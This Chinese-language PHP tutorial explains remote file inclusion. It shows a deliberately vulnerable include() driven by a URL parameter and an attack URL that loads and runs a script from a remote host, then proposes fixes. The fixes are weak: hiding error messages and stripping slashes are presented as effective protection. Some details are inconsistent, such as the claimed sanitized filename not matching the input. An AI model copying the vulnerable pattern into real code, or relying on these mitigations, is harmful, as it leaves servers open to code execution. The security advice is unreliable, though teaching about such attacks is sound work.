以下代碼(Code)實現了根據浏覽器地址欄參數的文件名稱包含不同文件的功能。
復制代碼 代碼如下:
<?php
$file_name = $_GET["filename"]; //獲得當前文件名
include("$file_name "); //包含文件
//一些其他操作
?>
這時,通過在地址欄上指定不同的文件名就可以實現包含不同文件並執行的功能。例如,通過在浏覽器上訪問http://localhost/test.php?filename=myinc.php就可以在代碼(Code)中包含並執行myinc.php文件。
由於上面的代碼(Code)沒有進行任何錯誤處理,在浏覽器上不加參數運行,所以將得到以下運行結果。
Warning: include(.php) [function.include]: failed to open stream: No such file or directory in C:\Program Files\xampp\htdocs\Bugs\test6.php on line 3
Warning: include() [function.include]: Failed opening '.php' for inclusion (include_path='.;C:\Program Files\xampp\php\pear\') in C:\Program Files\xampp\htdocs\Bugs\test6.php on line 3
訪問者通過讀取這段錯誤信息,可以得知當前的操作是一個文件包含操作。這時,可以在自己的服務器上放置一個相應的腳本代碼。需要注意的是PHP在獲取遠程文件時獲得的是遠程服務器的最終輸出結果,而不是文件本身。該腳本代碼位於192.168.0.1服務器上,文件名為hello.txt,腳本代碼(Code)如下所示。
復制代碼 代碼如下:
<?php
echo "hello world!";
?>
這時,通過在浏覽器中訪問http://localhost/test.php?filename=http://192.168.0.1/hello.txt就可以運行hello.txt中的腳本了。
為了解決這個問題,一種方式是完善代碼的錯誤信息,使訪問者無法知道當前腳本正在包含參數中指定的文件。修改後的代碼(Code)如下所示。
復制代碼 代碼如下:
<?php
$file_name = $_GET["filename"]; //獲得當前文件名
if(!@include("$file_name.php")) //包含文件
{
die("頁面在浏覽過程中出現錯誤");
}
//一些其他操作
?>
修改後,如果在被包含的文件無法找到時將出現“頁面在浏覽過程中出現錯誤”的錯誤信息,訪問者將無法獲得當前頁面的具體操作信息。
第二種方式可以更加有效地防止遠程文件包含攻擊。方式是替換地址欄參數中的斜線“/”。這樣,在地址欄參數中輸入遠程文件地址時,代碼將無法正確地獲得參數。修改後的代碼(Code)如下所示。
復制代碼 代碼如下:
<?php
$file_name = str_replace('/', '', $_GET["filename"]); //獲得當前文件名
if(!@include("$file_name.php")) //包含文件
{
die("頁面在浏覽過程中出現錯誤");
}
//一些其他操作
?>
這樣,在浏覽器中訪問http://localhost/test.php?filename=http://192.168.0.1/hello.txt 時,實際上PHP代碼(Code)獲得的包含文件名稱是http:192.168.0.1bugstest6_test。頁面將不會包含遠程文件,並顯示相應的錯誤信息。
